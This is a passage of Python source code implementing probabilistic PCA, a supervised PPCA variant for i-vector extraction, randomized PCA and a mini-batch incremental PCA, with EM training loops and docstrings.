  n_iter : {integer, 'auto'}
      if 'auto', keep iterating until no more improvement (i.e. reduction
      in `sigma` value) compared to the `improve_threshold`
  improve_threshold : scalar
      convergence threshold, only used in case `n_iter='auto'`
  solver : {'traditional', 'simple'}
      'traditional' uses the exact EM update (keeps the posterior
      covariance term `num_samples * Sigma`); 'simple' omits that term
  verbose: {0, 1}
      showing logging information during fitting
  random_state : {None, integer, numpy.random.RandomState}
      seed or generator used to initialize the factor matrix `V`

  Attributes
  ----------
  V_ : [feat_dim, n_components]
      total variability matrix
  bias_ : [feat_dim]
      bias vector
  sigma_ : scalar
      variance of error term

  References
  ----------
  [1] Ville Vestman and Tomi Kinnunen, "Supervector Compression
  Strategies to Speed up i-vector System Development",
  submitted to Speaker Odyssey 2018.
  """

  def __init__(self,
               n_components=None,
               bias='auto',
               n_iter='auto',
               improve_threshold=1e-3,
               solver='traditional',
               verbose=0,
               random_state=None):
    super(PPCA, self).__init__()
    # ====== checking n_components ====== #
    if isinstance(n_components, Number):
      assert n_components > 0, \
        "`n_components` must be greater than 0, but given: %d" % n_components
      n_components = int(n_components)
    elif n_components is not None:
      raise ValueError("`n_components` can be None or integer")
    self.n_components_ = n_components
    # ====== checking bias ====== #
    if isinstance(bias, string_types):
      bias = bias.strip().lower()
      assert bias == 'auto', 'Invalid value for `bias`: %s' % bias
    elif not isinstance(bias, (np.ndarray, Number)):
      raise ValueError("`bias` can be 'auto', numpy.ndarray or a number")
    self.bias_ = bias
    # ====== checking solver ====== #
    if solver not in ('traditional', 'simple'):
      raise ValueError("`solver` must be: 'traditional', or 'simple'")
    self.solver_ = solver
    # ====== checking n_iter ====== #
    if isinstance(n_iter, string_types):
      n_iter = n_iter.lower()
      assert n_iter == 'auto', 'Invalid `n_iter` value: %s' % n_iter
    elif isinstance(n_iter, Number):
      assert n_iter > 0, "`n_iter` must greater than 0, but given: %d" % n_iter
    self.n_iter_ = n_iter
    # ====== checking random_state ====== #
    if random_state is None:
      rand = np.random.RandomState(seed=None)
    elif isinstance(random_state, Number):
      # BUGFIX: the given integer seed was previously discarded
      # (`seed=None`), which made `random_state=<int>` non-reproducible;
      # now the seed is actually used
      rand = np.random.RandomState(seed=int(random_state))
    elif isinstance(random_state, np.random.RandomState):
      rand = random_state
    else:
      raise ValueError("No suppport for `random_state` value: %s" %
                       str(random_state))
    self.random_state_ = rand
    # ====== other dimension ====== #
    self.improve_threshold_ = float(improve_threshold)
    self.feat_dim_ = None  # set during `fit`
    self.verbose_ = int(verbose)

  def fit(self, X, y=None):
    """Estimate `V_`, `bias_` and `sigma_` from data via EM.

    Parameters
    ----------
    X : matrix [num_samples, feat_dim]
    y : ignored, present for scikit-learn API compatibility
    """
    # ====== initialize ====== #
    num_samples, feat_dim = X.shape
    n_components = feat_dim if self.n_components_ is None else self.n_components_
    # `isinstance` check (instead of `self.bias_ == 'auto'`) avoids an
    # elementwise ndarray comparison when `fit` is called a second time,
    # after `bias_` has been replaced by the fitted bias vector
    if isinstance(self.bias_, string_types):
      bias = np.mean(X, 0)
    elif isinstance(self.bias_, Number):
      bias = np.full(shape=(feat_dim,), fill_value=self.bias_)
    else:
      bias = self.bias_
    assert bias.shape == (feat_dim,), \
    "Invialid `bias` given shape: %s, require shape: %s" % (str(bias.shape), str((feat_dim,)))
    # ====== initialize parameters ====== #
    V = self.random_state_.rand(feat_dim, n_components)
    last_sigma = None
    sigma = 1
    centeredM = X - bias[np.newaxis, :]
    # average per-entry variance of the centered data, reused by the
    # closed-form `sigma` update in every iteration
    varianceM = np.sum(centeredM**2) / (num_samples * feat_dim)
    # ====== training ====== #
    if self.verbose_:
      print(
          '[PPCA]n_components: %d n_sample: %d feat_dim: %d n_iter: %d threshold: %f solver: %s'
          % (n_components, num_samples, feat_dim, -1 if self.n_iter_ == 'auto'
             else self.n_iter_, self.improve_threshold_, self.solver_))
    curr_n_iter = 0
    while True:
      # E-step: posterior statistics of the latent variables
      B = (V * 1 / sigma).T  # [n_components, feat_dim]
      Sigma = np.linalg.inv(np.eye(n_components) +
                            np.dot(B, V))  # [n_components, n_components]
      my = np.dot(np.dot(Sigma, B), centeredM.T)  # [n_components, num_samples]
      if self.solver_ == 'traditional':
        sumEmm = num_samples * Sigma + np.dot(my, my.T)
      elif self.solver_ == 'simple':
        sumEmm = np.dot(my, my.T)
      sumEmmInv = np.linalg.inv(sumEmm)  # [n_components, n_components]
      # M-step: updating V and sigma for next iteration
      V = np.dot(np.dot(centeredM.T, my.T),
                 sumEmmInv)  # [feat_dim, n_components]
      last_sigma = sigma
      sigma = varianceM - np.sum(
          sumEmm * np.dot(V.T, V)) / (feat_dim * num_samples)
      improvement = last_sigma - sigma
      # log
      if self.verbose_ > 0:
        print("Iteration: %d sigma: %.3f improvement: %.3f" %
              (curr_n_iter, sigma, improvement))
      # check iteration escape
      curr_n_iter += 1
      if isinstance(self.n_iter_, Number):
        if curr_n_iter >= self.n_iter_:
          break
      elif curr_n_iter > 1 and improvement < self.improve_threshold_:
        break
    # ====== save the model ====== #
    # record new dimensions
    self.feat_dim_ = feat_dim
    self.n_components_ = n_components
    # trained vectors and matrices
    self.V_ = V
    self.bias_ = bias
    self.sigma_ = sigma
    # pre-calculate matrix for transform
    B = (V * 1 / sigma).T
    Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V))
    self.extractorMatrix_ = np.dot(Sigma, B)  # [n_components, feat_dim]

  def transform(self, X):
    """Project each row of `X` onto the latent components.

    Parameters
    ----------
    X : matrix [num_samples, feat_dim]

    Returns
    -------
    matrix [num_samples, n_components]
    """
    assert hasattr(self, 'extractorMatrix_'), "The model hasn't `fit` on data"
    assert X.shape[1] == self.feat_dim_, \
    "Expect input matrix with shape: [?, %d], but give: %s" % (self.feat_dim_, str(X.shape))
    ivec = np.dot(self.extractorMatrix_, (X - self.bias_[np.newaxis, :]).T)
    return ivec.T
class SupervisedPPCA(PPCA):
  """ Supervised Probabilistic Principal Components Analysis
  (C) Copyright University of Eastern Finland (UEF).
  Ville Vestman, ville.vestman@uef.fi,
  Tomi Kinnunen, tkinnu@cs.uef.fi.
  Parameters
  ----------
  n_components : {int, None}
    if None, keep the same dimensions as input features
  bias : {vector, 'auto'} [feat_dim,]
    if 'auto' take mean of training data
  beta : scalar (default: 1)
    a weight parameter (use beta = 1 as default)
  n_iter : {integer, 'auto'}
    if 'auto', keep iterating until no more improvement (i.e. reduction in `sigma` value)
    compared to the `improve_threshold`
  improve_threshold : scalar
    Only used in case `n_iter='auto'`
  solver : {'traditional', 'simple'}
  extractor : {'supervised', 'unsupervised'}
    'supervised' is the probabilistic partial least squares extractor using
    both unsupervised and supervised information
  verbose: {0, 1}
    showing logging information during fitting
  random_state : {None, integer, numpy.random.RandomState}
  Attributes
  ----------
  V_ : [feat_dim, n_components]
    total variability matrix
  Q_ : [feat_dim, n_components]
    matrix for mapping speaker-dependent supervectors to i-vectors
  sigma_ : scalar
    variance of error term
  rho_ : scalar
    variance of error term in speaker-dependent supervector model
  bias_ : [feat_dim,]
    bias vector
  classBias_ : [feat_dim,]
    mean of speaker-dependent supervectors
  """
  def __init__(self,
               n_components=None,
               bias='auto',
               beta=1,
               n_iter='auto',
               improve_threshold=1e-3,
               solver='traditional',
               extractor='supervised',
               verbose=0,
               random_state=None):
    super(SupervisedPPCA, self).__init__(n_components=n_components,
                                         bias=bias,
                                         n_iter=n_iter,
                                         solver=solver,
                                         improve_threshold=improve_threshold,
                                         verbose=verbose,
                                         random_state=random_state)
    self.beta_ = float(beta)
    # ====== check extractor ====== #
    extractor = str(extractor).lower()
    if extractor not in ('supervised', 'unsupervised'):
      raise ValueError(
          "`extractor` can only be: 'unsupervised' or 'supervised'")
    self.extractor_ = extractor
  def fit(self, X, y, z=None):
    """Fit the supervised PPCA model by EM.

    Parameters
    ----------
    X : matrix [num_samples, feat_dim]
    y : vector (int) [num_samples,]
    z : matrix [num_classes, feat_dim]
      class-dependent feature vectors for each class from 0 to `num_classes - 1`
      (in this order).
    """
    # ====== initialize ====== #
    num_samples, feat_dim = X.shape
    num_classes = z.shape[0] if z is not None else len(np.unique(y))
    n_components = feat_dim if self.n_components_ is None else self.n_components_
    if self.bias_ == 'auto':
      bias = np.mean(X, 0)
    elif isinstance(self.bias_, Number):
      bias = np.full(shape=(feat_dim,), fill_value=self.bias_)
    else:
      bias = self.bias_
    assert bias.shape == (feat_dim,), \
        "Invialid `bias` given shape: %s, require shape: %s" % (str(bias.shape), str((feat_dim,)))
    # checking `y`
    y = y.ravel().astype('int32')
    assert y.shape[0] == num_samples, \
        "Number of samples incosistent in `X`(%s) and `y`(%s)" % (str(X.shape), str(y.shape))
    # checking `z`
    if z is None:
      # No class means supplied: use per-class sample means. NOTE(review):
      # rows of `z` for labels absent from `y` remain uninitialized
      # (np.empty) — assumed harmless because `z[y]` never indexes them.
      z = np.empty(shape=(max(np.max(y) + 1, num_classes), feat_dim),
                   dtype=X.dtype)
      for i in np.unique(y):
        z[i, :] = np.mean(X[y == i], axis=0, keepdims=True)
    else:
      assert z.shape[0] == num_classes
      assert z.shape[1] == feat_dim
    # ====== initialize parameters ====== #
    V = self.random_state_.rand(feat_dim, n_components)
    Q = self.random_state_.rand(feat_dim, n_components)
    last_sigma = None
    sigma = 1
    last_rho = None
    rho = 1
    # centered features and centered class-dependent vectors (one row per sample)
    centeredM = X - bias[np.newaxis, :]
    varianceM = np.sum(centeredM**2) / (num_samples * feat_dim)
    centeredY = z[y]
    classBias = np.mean(centeredY, 0)
    centeredY = centeredY - classBias[np.newaxis, :]
    varianceY = np.sum(centeredY**2) / (num_samples * feat_dim)
    # ====== training ====== #
    if self.verbose_:
      print(
          '[S-PPCA]n_components: %d n_sample: %d feat_dim: %d n_iter: %d threshold: %f solver: %s'
          % (n_components, num_samples, feat_dim, -1 if self.n_iter_ == 'auto'
             else self.n_iter_, self.improve_threshold_, self.solver_))
    curr_n_iter = 0
    # EM loop: E-step computes posterior stats (Sigma, my), M-step updates
    # V, Q, sigma, rho. Terminates on max iterations or small improvement.
    while True:
      B = (V * 1 / sigma).T  # [feat_dim, n_components]
      C = (Q * self.beta_ * 1 / rho).T  # [feat_dim, n_components]
      Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V) +
                            np.dot(C, Q))  # [n_components, n_components]
      # [n_components, num_samples]
      my = np.dot(Sigma, np.dot(B, centeredM.T) + np.dot(C, centeredY.T))
      if self.solver_ == 'traditional':
        sumEmm = num_samples * Sigma + np.dot(my, my.T)
      elif self.solver_ == 'simple':
        sumEmm = np.dot(my, my.T)
      sumEmmInv = np.linalg.inv(sumEmm)  # [n_components, n_components]
      # updating V and sigma for next iteration
      V = np.dot(np.dot(centeredM.T, my.T),
                 sumEmmInv)  # [feat_dim, n_components]
      Q = np.dot(np.dot(centeredY.T, my.T),
                 sumEmmInv)  # [feat_dim, n_components]
      last_sigma = sigma
      sigma = varianceM - np.sum(
          sumEmm * np.dot(V.T, V)) / (feat_dim * num_samples)
      improvement_sigma = last_sigma - sigma
      last_rho = rho
      rho = varianceY - np.sum(
          sumEmm * np.dot(Q.T, Q)) / (feat_dim * num_samples)
      improvement_rho = last_rho - rho
      # log
      if self.verbose_ > 0:
        print(
            "Iteration: %d sigma: %.3f rho: %.3f improvement: %.3f:%.3f"
            % (curr_n_iter, sigma, rho, improvement_sigma, improvement_rho))
      # check iteration escape
      curr_n_iter += 1
      if isinstance(self.n_iter_, Number):
        if curr_n_iter >= self.n_iter_:
          break
      elif curr_n_iter > 1 and \
          improvement_sigma < self.improve_threshold_ and \
          improvement_rho < self.improve_threshold_:
        break
    # ====== save the model ====== #
    # record new dimensions
    self.feat_dim_ = feat_dim
    self.n_components_ = n_components
    self.num_classes_ = num_classes
    # trained vectors and matrices
    self.V_ = V
    self.Q_ = Q
    self.bias_ = bias
    self.classBias_ = classBias
    self.sigma_ = sigma
    self.rho_ = rho
    # pre-calculate matrix for PPCA transform
    B = (V * 1 / sigma).T
    Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V))
    self.extractorMatrix_ = np.dot(Sigma, B)  # [n_components, feat_dim]
    # pre-calculate matrix for PPLS transform
    A = np.concatenate([V, Q], axis=0)  # [2 * feat_dim, n_components]
    B = np.concatenate([(V * 1 / sigma).T, (Q * 1 / rho).T],
                       axis=-1)  # [n_components, 2 * feat_dim]
    sigmaW = np.linalg.inv(np.eye(n_components) +
                           np.dot(B, A))  # [n_components, n_components]
    self.extractorMatrixPPLS_ = np.dot(sigmaW,
                                       B)  # [n_components, 2 * feat_dim]
    C = np.dot(V.T,
               V) + sigma * np.eye(n_components)  # [n_components, n_components]
    self.labelMatrix_ = np.dot(Q, np.linalg.solve(C,
                                                  V.T))  # [feat_dim, feat_dim]
  def transform(self, X):
    """Extract i-vectors from `X` ([num_samples, feat_dim]).

    With `extractor='unsupervised'` this defers to the plain PPCA
    extractor; otherwise the PPLS extractor is used: class-dependent
    vectors are first predicted via `labelMatrix_`, then the stacked
    [features; predicted labels] vector is projected with
    `extractorMatrixPPLS_`.
    """
    if self.extractor_ == 'unsupervised':
      return super(SupervisedPPCA, self).transform(X)
    else:
      centeredM = X - self.bias_[np.newaxis, :]
      labels = np.dot(self.labelMatrix_,
                      centeredM.T) + self.classBias_[:, np.newaxis]
      ivec = np.dot(
          self.extractorMatrixPPLS_,
          np.concatenate([X.T, labels], axis=0) -
          np.concatenate([self.bias_, self.classBias_])[:, np.newaxis])
      return ivec.T
# ===========================================================================
# PCA
# ===========================================================================
class RandomizedPCA(BaseEstimator, TransformerMixin):
  """Principal component analysis (PCA) using randomized SVD
  Linear dimensionality reduction using approximated Singular Value
  Decomposition of the data and keeping only the most significant
  singular vectors to project the data to a lower dimensional space.
  Parameters
  ----------
  n_components : int, optional
    Maximum number of components to keep. When not given or None, this
    is set to n_features (the second dimension of the training data).
  copy : bool
    If False, data passed to fit are overwritten and running
    fit(X).transform(X) will not yield the expected results,
    use fit_transform(X) instead.
  iterated_power : int, default=2
    Number of iterations for the power method.
  whiten : bool, optional
    When True (False by default) the `components_` vectors are multiplied
    by the square root of (n_samples) and divided by the singular values to
    ensure uncorrelated outputs with unit component-wise variances.
    Whitening will remove some information from the transformed signal
    (the relative variance scales of the components) but can sometime
    improve the predictive accuracy of the downstream estimators by
    making their data respect some hard-wired assumptions.
  random_state : int, RandomState instance or None, optional, default=None
    If int, random_state is the seed used by the random number generator;
    If RandomState instance, random_state is the random number generator;
    If None, the random number generator is the RandomState instance used
    by `np.random`.
  Attributes
  ----------
  components_ : array, shape (n_components, n_features)
    Components with maximum variance.
  explained_variance_ratio_ : array, shape (n_components,)
    Percentage of variance explained by each of the selected components.
    If k is not set then all components are stored and the sum of explained
    variances is equal to 1.0.
  singular_values_ : array, shape (n_components,)
    The singular values corresponding to each of the selected components.
    The singular values are equal to the 2-norms of the ``n_components``
    variables in the lower-dimensional space.
  mean_ : array, shape (n_features,)
    Per-feature empirical mean, estimated from the training set.
  Examples
  --------
  >>> import numpy as np
  >>> from sklearn.decomposition import RandomizedPCA
  >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
  >>> pca = RandomizedPCA(n_components=2)
  >>> pca.fit(X)                 # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
  RandomizedPCA(copy=True, iterated_power=2, n_components=2,
         random_state=None, whiten=False)
  >>> print(pca.explained_variance_ratio_)  # doctest: +ELLIPSIS
  [ 0.99244...  0.00755...]
  >>> print(pca.singular_values_)  # doctest: +ELLIPSIS
  [ 6.30061...  0.54980...]
  References
  ----------
  .. [Halko2009] `Finding structure with randomness: Stochastic algorithms
    for constructing approximate matrix decompositions Halko, et al., 2009
    (arXiv:909)`
  .. [MRT] `A randomized algorithm for the decomposition of matrices
    Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
  """
  def __init__(self,
               n_components=None,
               copy=True,
               iterated_power=2,
               whiten=False,
               random_state=None):
    self.n_components = n_components
    self.copy = copy
    self.iterated_power = iterated_power
    self.whiten = whiten
    self.random_state = random_state
  def fit(self, X, y=None):
    """Fit the model with X by extracting the first principal components.
    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
      Training data, where n_samples in the number of samples
      and n_features is the number of features.
    y : Ignored.
    Returns
    -------
    self : object
      Returns the instance itself.
    """
    self._fit(check_array(X))
    return self
  def _fit(self, X):
    """Fit the model to the data X.
    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
      Training vector, where n_samples in the number of samples and
      n_features is the number of features.
    Returns
    -------
    X : ndarray, shape (n_samples, n_features)
      The input data, copied, centered and whitened when requested.
    """
    random_state = check_random_state(self.random_state)
    X = np.atleast_2d(as_float_array(X, copy=self.copy))
    n_samples = X.shape[0]
    # Center data
    self.mean_ = np.mean(X, axis=0)
    X -= self.mean_
    if self.n_components is None:
      n_components = X.shape[1]
    else:
      n_components = self.n_components
    # truncated randomized SVD of the centered data
    U, S, V = randomized_svd(X,
                             n_components,
                             n_iter=self.iterated_power,
                             random_state=random_state)
    self.explained_variance_ = exp_var = (S**2) / (n_samples - 1)
    full_var = np.var(X, ddof=1, axis=0).sum()
    self.explained_variance_ratio_ = exp_var / full_var
    self.singular_values_ = S  # Store the singular values.
    if self.whiten:
      # scale components so transformed outputs have unit variance
      self.components_ = V / S[:, np.newaxis] * math.sqrt(n_samples)
    else:
      self.components_ = V
    return X
  def transform(self, X):
    """Apply dimensionality reduction on X.
    X is projected on the first principal components previous extracted
    from a training set.
    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
      New data, where n_samples in the number of samples
      and n_features is the number of features.
    Returns
    -------
    X_new : array-like, shape (n_samples, n_components)
    """
    check_is_fitted(self, 'mean_')
    X = check_array(X)
    if self.mean_ is not None:
      X = X - self.mean_
    X = np.dot(X, self.components_.T)
    return X
  def fit_transform(self, X, y=None):
    """Fit the model with X and apply the dimensionality reduction on X.
    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
      New data, where n_samples in the number of samples
      and n_features is the number of features.
    y : Ignored.
    Returns
    -------
    X_new : array-like, shape (n_samples, n_components)
    """
    X = check_array(X)
    # _fit returns the centered data, so projection is a single dot product
    X = self._fit(X)
    return np.dot(X, self.components_.T)
  def inverse_transform(self, X):
    """Transform data back to its original space.
    Returns an array X_original whose transform would be X.
    Parameters
    ----------
    X : array-like, shape (n_samples, n_components)
      New data, where n_samples in the number of samples
      and n_components is the number of components.
    Returns
    -------
    X_original array-like, shape (n_samples, n_features)
    Notes
    -----
    If whitening is enabled, inverse_transform does not compute the
    exact inverse operation of transform.
    """
    check_is_fitted(self, 'mean_')
    X_original = np.dot(X, self.components_)
    if self.mean_ is not None:
      X_original = X_original + self.mean_
    return X_original
class MiniBatchPCA(IncrementalPCA):
  """ A modified version of IncrementalPCA to effectively
  support multi-processing (but not work)
  Original Author: Kyle Kastner <kastnerkyle@gmail.com>
          Giorgio Patrini
  License: BSD 3 clause
  Incremental principal components analysis (IPCA).
  Linear dimensionality reduction using Singular Value Decomposition of
  centered data, keeping only the most significant singular vectors to
  project the data to a lower dimensional space.
  Depending on the size of the input data, this algorithm can be much more
  memory efficient than a PCA.
  This algorithm has constant memory complexity, on the order
  of ``batch_size``, enabling use of np.memmap files without loading the
  entire file into memory.
  The computational overhead of each SVD is
  ``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
  remain in memory at a time. There will be ``n_samples / batch_size`` SVD
  computations to get the principal components, versus 1 large SVD of
  complexity ``O(n_samples * n_features ** 2)`` for PCA.
  Read more in the :ref:`User Guide <IncrementalPCA>`.
  Parameters
  ----------
  n_components : int or None, (default=None)
    Number of components to keep. If ``n_components `` is ``None``,
    then ``n_components`` is set to ``min(n_samples, n_features)``.
  batch_size : int or None, (default=None)
    The number of samples to use for each batch. Only used when calling
    ``fit``. If ``batch_size`` is ``None``, then ``batch_size``
    is inferred from the data and set to ``5 * n_features``, to provide a
    balance between approximation accuracy and memory consumption.
  copy : bool, (default=True)
    If False, X will be overwritten. ``copy=False`` can be used to
    save memory but is unsafe for general use.
  whiten : bool, optional
    When True (False by default) the ``components_`` vectors are divided
    by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
    with unit component-wise variances.
    Whitening will remove some information from the transformed signal
    (the relative variance scales of the components) but can sometimes
    improve the predictive accuracy of the downstream estimators by
    making data respect some hard-wired assumptions.
  Attributes
  ----------
  components_ : array, shape (n_components, n_features)
    Components with maximum variance.
  explained_variance_ : array, shape (n_components,)
    Variance explained by each of the selected components.
  explained_variance_ratio_ : array, shape (n_components,)
    Percentage of variance explained by each of the selected components.
    If all components are stored, the sum of explained variances is equal
    to 1.0
  mean_ : array, shape (n_features,)
    Per-feature empirical mean, aggregate over calls to ``partial_fit``.
  var_ : array, shape (n_features,)
    Per-feature empirical variance, aggregate over calls to
    ``partial_fit``.
  noise_variance_ : float
    The estimated noise covariance following the Probabilistic PCA model
    from Tipping and Bishop 1999. See "Pattern Recognition and
    Machine Learning" by C. Bishop, 12.2.1 p. 574 or
    http://www.miketipping.com/papers/met-mppca.pdf.
  n_components_ : int
    The estimated number of components. Relevant when
    ``n_components=None``.
  n_samples_seen_ : int
    The number of samples processed by the estimator. Will be reset on
    new calls to fit, but increments across ``partial_fit`` calls.
  Notes
  -----
  Implements the incremental PCA model from:
  `D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
  Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
  pp. 125-141, May 2008.`
  See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
  This model is an extension of the Sequential Karhunen-Loeve Transform from:
  `A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
  its Application to Images, IEEE Transactions on Image Processing, Volume 9,
  Number 8, pp. 1371-1374, August 2000.`
  See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
  We have specifically abstained from an optimization used by authors of both
  papers, a QR decomposition used in specific situations to reduce the
  algorithmic complexity of the SVD. The source for this technique is
  `Matrix Computations, Third Edition, G. Holub and C. Van Loan, Chapter 5,
  section 5.4.4, pp 252-253.`. This technique has been omitted because it is
  advantageous only when decomposing a matrix with ``n_samples`` (rows)
  >= 5/3 * ``n_features`` (columns), and hurts the readability of the
  implemented algorithm. This would be a good opportunity for future
  optimization, if it is deemed necessary.
  For `multiprocessing`, you can do parallelized `partial_fit` or `transform`
  but you cannot do `partial_fit` in one process and `transform` in the others.
  Application
  -----------
  In detail, in order for PCA to work well, informally we require that
  (i) The features have approximately zero mean, and
  (ii) The different features have similar variances to each other.
  With natural images, (ii) is already satisfied even without variance
  normalization, and so we won’t perform any variance normalization.
  (If you are training on audio data—say, on spectrograms—or on text data—say,
  bag-of-word vectors—we will usually not perform variance normalization
  either.)
  By using PCA, we aim for:
  (i) the features are less correlated with each other, and
  (ii) the features all have the same variance.
  Original link: http://ufldl.stanford.edu/tutorial/unsupervised/PCAWhitening/
  References
  ----------
  D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
  Tracking, International Journal of Computer Vision, Volume 77,
  Issue 1-3, pp. 125-141, May 2008.
  G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
  Section 5.4.4, pp. 252-253.
  See also
  --------
  PCA
  RandomizedPCA
  KernelPCA
  SparsePCA
  TruncatedSVD
  """
  def __init__(self,
               n_components=None,
               whiten=False,
               copy=True,
               batch_size=None):
    super(MiniBatchPCA, self).__init__(n_components=n_components,
                                       whiten=whiten,
                                       copy=copy,
                                       batch_size=batch_size)
    # some statistics
    self.n_samples_seen_ = 0
    self.mean_ = .0
    self.var_ = .0
    self.components_ = None
    # if nb_samples < nb_components, then the mini batch is cached until
    # we have enough samples
    self._cache_batches = []
    self._nb_cached_samples = 0
  @property
  def is_fitted(self):
    # True once at least one SVD update has produced components_
    return self.components_ is not None
  # ==================== Training ==================== #
  def fit(self, X, y=None):
    """Fit the model with X, using minibatches of size batch_size.
    Parameters
    ----------
    X: array-like, shape (n_samples, n_features)
      Training data, where n_samples is the number of samples and
      n_features is the number of features.
    y: Passthrough for ``Pipeline`` compatibility.
    Returns
    -------
    self: object
      Returns the instance itself.
    """
    X = check_array(X, copy=self.copy, dtype=[np.float64, np.float32])
    n_samples, n_features = X.shape
    if self.batch_size is None:
      batch_size = 12 * n_features
    else:
      batch_size = self.batch_size
    # feed the data one mini-batch at a time; input already validated above
    for batch in gen_batches(n_samples, batch_size):
      x = X[batch]
      self.partial_fit(x, check_input=False)
    return self
  def partial_fit(self, X, y=None, check_input=True):
    """Incremental fit with X. All of X is processed as a single batch.
    Parameters
    ----------
    X: array-like, shape (n_samples, n_features)
      Training data, where n_samples is the number of samples and
      n_features is the number of features.
    Returns
    -------
    self: object
      Returns the instance itself.
    """
    # ====== check the samples and caches ====== #
    if check_input:
      X = check_array(X, copy=self.copy, dtype=[np.float64, np.float32])
    n_samples, n_features = X.shape
    # check number of components
    if self.n_components is None:
      self.n_components_ = n_features
    elif not 1 <= self.n_components <= n_features:
      raise ValueError("n_components=%r invalid for n_features=%d, need "
                       "more rows than columns for IncrementalPCA "
                       "processing" % (self.n_components, n_features))
    else:
      self.n_components_ = self.n_components
    # check the cache: accumulate small batches until one SVD is worthwhile
    if n_samples < n_features or self._nb_cached_samples > 0:
      self._cache_batches.append(X)
      self._nb_cached_samples += n_samples
      # not enough samples yet
      if self._nb_cached_samples < n_features:
        return
      else:  # group mini batch into big batch
        X = np.concatenate(self._cache_batches, axis=0)
        self._cache_batches = []
        self._nb_cached_samples = 0
        n_samples = X.shape[0]
    # ====== fit the model ====== #
    if (self.components_ is not None) and (self.components_.shape[0] !=
                                           self.n_components_):
      raise ValueError("Number of input features has changed from %i "
                       "to %i between calls to partial_fit! Try "
                       "setting n_components to a fixed value." %
                       (self.components_.shape[0], self.n_components_))
    # Update stats - they are 0 if this is the first step
    col_mean, col_var, n_total_samples = \
        _incremental_mean_and_var(X, last_mean=self.mean_,
                                  last_variance=self.var_,
                                  last_sample_count=self.n_samples_seen_)
    total_var = np.sum(col_var * n_total_samples)
    if total_var == 0:  # if variance == 0, make no sense to continue
      return self
    # Whitening
    if self.n_samples_seen_ == 0:
      # If it is the first step, simply whiten X
      X -= col_mean
    else:
      col_batch_mean = np.mean(X, axis=0)
      X -= col_batch_mean
      # Build matrix of combined previous basis and new data
      mean_correction = \
          np.sqrt((self.n_samples_seen_ * n_samples) /
                  n_total_samples) * (self.mean_ - col_batch_mean)
      X = np.vstack((self.singular_values_.reshape(
          (-1, 1)) * self.components_, X, mean_correction))
    U, S, V = linalg.svd(X, full_matrices=False)
    # sign convention so results are deterministic across runs
    U, V = svd_flip(U, V, u_based_decision=False)
    explained_variance = S**2 / n_total_samples
    explained_variance_ratio = S**2 / total_var
    self.n_samples_seen_ = n_total_samples
    self.components_ = V[:self.n_components_]
    self.singular_values_ = S[:self.n_components_]
    self.mean_ = col_mean
    self.var_ = col_var
    self.explained_variance_ = explained_variance[:self.n_components_]
    self.explained_variance_ratio_ = \
        explained_variance_ratio[:self.n_components_]
    if self.n_components_ < n_features:
      self.noise_variance_ = \
          explained_variance[self.n_components_:].mean()
    else:
      self.noise_variance_ = 0.
    return self
  def transform(self, X, n_components=None):
    """Batched projection of X; `n_components` < 1. selects enough
    components to cover that fraction of explained variance."""
    # ====== check number of components ====== #
    # specified percentage of explained variance
    if n_components is not None:
      # percentage of variances
      if n_components < 1.:
        _ = np.cumsum(self.explained_variance_ratio_)
        n_components = (_ > n_components).nonzero()[0][0] + 1
      # specific number of components
      else:
        n_components = int(n_components)
    # ====== other info ====== #
    n = X.shape[0]
    if self.batch_size is None:
      batch_size = 12 * len(self.mean_)
    else:
      batch_size = self.batch_size
    # ====== start transforming ====== #
    X_transformed = []
    for start, end in batching(n=n, batch_size=batch_size):
      x = super(MiniBatchPCA, self).transform(X=X[start:end])
      if n_components is not None:
        x = x[:, :n_components]
      X_transformed.append(x)
    return np.concatenate(X_transformed, axis=0)
  def invert_transform(self, X):
    # thin alias for IncrementalPCA.inverse_transform
    return super(MiniBatchPCA, self).inverse_transform(X=X)
  def transform_mpi(self, X, keep_order=True, ncpu=4, n_components=None):
    """ Same as `transform` but using multiprocessing """
    n = X.shape[0]
    if self.batch_size is None:
      batch_size = 12 * len(self.mean_)
    else:
      batch_size = self.batch_size
    batch_list = [(i, min(i + batch_size, n))
                  for i in range(0, n + batch_size, batch_size)
                  if i < n]
    # ====== run MPI jobs ====== #
    def map_func(batch):
      start, end = batch
      x = super(MiniBatchPCA, self).transform(X=X[start:end])
      # doing dim reduction here save a lot of memory for
      # inter-processors transfer
      if n_components is not None:
        x = x[:, :n_components]
      # just need to return the start for ordering
      yield start, x
    mpi = MPI(batch_list,
              func=map_func,
              ncpu=ncpu,
              batch=1,
              hwm=ncpu * 12,
              backend='python')
    # ====== process the return ====== #
    X_transformed = []
    for start, x in mpi:
      X_transformed.append((start, x))
    if keep_order:
      # workers may finish out of order; restore by batch start index
      X_transformed = sorted(X_transformed, key=lambda x: x[0])
    X_transformed = np.concatenate([x[-1] for x in X_transformed], axis=0)
    return X_transformed
  def __str__(self):
    if self.is_fitted:
      explained_vars = ';'.join([
          ctext('%.2f' % i, 'cyan') for i in self.explained_variance_ratio_[:8]
      ])
    else:
      explained_vars = 0
    s = '%s(batch_size=%s, #components=%s, #samples=%s, vars=%s)' % \
        (ctext('MiniBatchPCA', 'yellow'),
         ctext(self.batch_size, 'cyan'),
         ctext(self.n_components, 'cyan'),
         ctext(self.n_samples_seen_, 'cyan'),
         explained_vars)
    return s
| [
"nickartin13@gmail.com"
] | nickartin13@gmail.com |
